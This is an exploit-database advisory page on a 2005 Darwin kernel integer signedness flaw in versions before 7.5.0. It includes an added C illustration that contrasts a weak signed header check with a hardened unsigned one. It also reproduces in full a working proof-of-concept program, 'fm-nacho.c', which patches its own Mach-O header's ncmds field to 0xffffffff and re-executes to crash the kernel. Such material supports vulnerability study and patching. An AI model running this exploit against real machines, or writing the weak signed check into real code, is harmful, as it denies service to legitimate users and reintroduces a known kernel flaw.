Darwin Kernel Integer Overflow Vulnerability - exploit.company
Vendor: Darwin Kernel
By: nemo@pulltheplug.org
CVSS: 7.2 (HIGH)
CWE: 190 (Integer Overflow)
Product Name: Darwin Kernel
Affected Version From: < 7.5.0
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mac
2005

Darwin Kernel Integer Overflow Vulnerability

This vulnerability is due to a failure of the affected kernel to properly handle integer signedness. An attacker may leverage this issue to crash the affected computer, denying service to legitimate users. It has been speculated that this issue may also be leveraged to escalate privileges, although this is unconfirmed.

Mitigation:

Update to the latest version of Darwin Kernel
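
The signedness failure described above can be illustrated with a header check written two ways. This is an added example, not kernel source and not part of the original advisory. The function names, the 8-byte minimum load-command size used as the bound, and the sample header are assumptions constructed for illustration. Only the field offset 0x10 for ncmds and the value 0xffffffff come from the proof of concept on this page.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MH_MAGIC_32 0xfeedfaceu /* 32-bit Mach-O magic */
#define MH_HDR_SIZE 28u         /* seven 32-bit fields */
#define LC_MIN_SIZE 8u          /* cmd + cmdsize */

/* Read a host-endian 32-bit header field at byte offset off. */
static uint32_t rd32(const uint8_t *p, size_t off) {
    uint32_t v;
    memcpy(&v, p + off, sizeof v);
    return v;
}

/* Weak form (hypothetical): counts held as int, so 0xffffffff reads as -1
 * and satisfies the upper-bound test. */
int ncmds_ok_signed(const uint8_t *img, size_t len) {
    if (len < MH_HDR_SIZE || rd32(img, 0) != MH_MAGIC_32) return 0;
    int ncmds = (int)rd32(img, 0x10);
    int sizeofcmds = (int)rd32(img, 0x14);
    return ncmds <= sizeofcmds / (int)LC_MIN_SIZE;
}

/* Hardened form: unsigned fields, sizeofcmds bounded by the image size. */
int ncmds_ok_unsigned(const uint8_t *img, size_t len) {
    if (len < MH_HDR_SIZE || rd32(img, 0) != MH_MAGIC_32) return 0;
    uint32_t ncmds = rd32(img, 0x10);
    uint32_t sizeofcmds = rd32(img, 0x14);
    if (sizeofcmds > len - MH_HDR_SIZE) return 0;
    return ncmds <= sizeofcmds / LC_MIN_SIZE;
}

/* Constructed sample: header plus one 8-byte placeholder load command. */
size_t make_sample(uint8_t *out, uint32_t ncmds) {
    uint32_t hdr[7] = { MH_MAGIC_32, 0, 0, 0, ncmds, LC_MIN_SIZE, 0 };
    uint32_t lc[2] = { 0, LC_MIN_SIZE };
    memcpy(out, hdr, sizeof hdr);
    memcpy(out + sizeof hdr, lc, sizeof lc);
    return sizeof hdr + sizeof lc;
}

int main(void) {
    uint8_t img[36];
    size_t n = make_sample(img, 0xffffffffu);
    printf("signed check accepts:   %d\n", ncmds_ok_signed(img, n));
    printf("unsigned check accepts: %d\n", ncmds_ok_unsigned(img, n));
    return 0;
}
```

The signed variant accepts the header because -1 is below any non-negative bound; the unsigned variant rejects it because 0xffffffff commands cannot fit in 8 bytes of load-command data.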

Exploit-DB raw data:

/*
source: https://www.securityfocus.com/bid/12314/info

Reportedly a local integer overflow vulnerability affects the Darwin Kernel. This issue is due to a failure of the affected kernel to properly handle integer signedness.

An attacker may leverage this issue to cause the affected computer to crash, denying service to legitimate users. It has been speculated that this issue may also be leveraged to escalate privileges, although this is unconfirmed.
*/

//---------------------( fm-nacho.c )--------------------------
/*
 * DoS for Darwin Kernel Version < 7.5.0
 * -(nemo@pulltheplug.org)-
 * 2005
 *
 * greetz to awnex, cryp, nt, andrewg, arc, mercy, amnesia ;)
 * irc.pulltheplug.org (#social)
 */

#include <stdio.h>
#include <stdlib.h>   /* exit */
#include <unistd.h>   /* sleep, execv */

int main(int ac, char **av)
{
        FILE *me;
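        int rpl = 0xffffffff;   /* replacement value for ncmds; -1 when read as signed */
        fpos_t pos = 0x10;      /* offset of ncmds in the 32-bit mach_header */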
        printf("-( nacho - 2004 DoS for OSX (darwin < 7.5.0 )-\n");
        printf("-( nemo@pulltheplug.org )-\n\n");
        printf("[+] Opening file for writing.\n");
        if(!(me = fopen(*av,"r+"))) {
                printf("[-] Error opening exe.\n");
                exit(1);
        }
        printf("[+] Seeking to ncmds.\n");
        if((fsetpos(me,&pos)) == -1) {
                printf("[-] Error seeking to ncmds.\n");
                exit(1);
        }
        printf("[+] Changing ncmds to 0x%x.\n",rpl);
        if(fwrite(&rpl,4,1,me) < 1) {
                printf("[-] Error writing to file.\n");
                exit(1);
        }
        fclose(me);
        printf("[+] Re-executing with modified mach-o header.\n");
        sleep(5);
        if(execv(*av,av) == -1 ) {
                printf("[-] Error executing %s, please run manually.\n",*av);
                exit(1);
        }
        exit(0); // hrm
}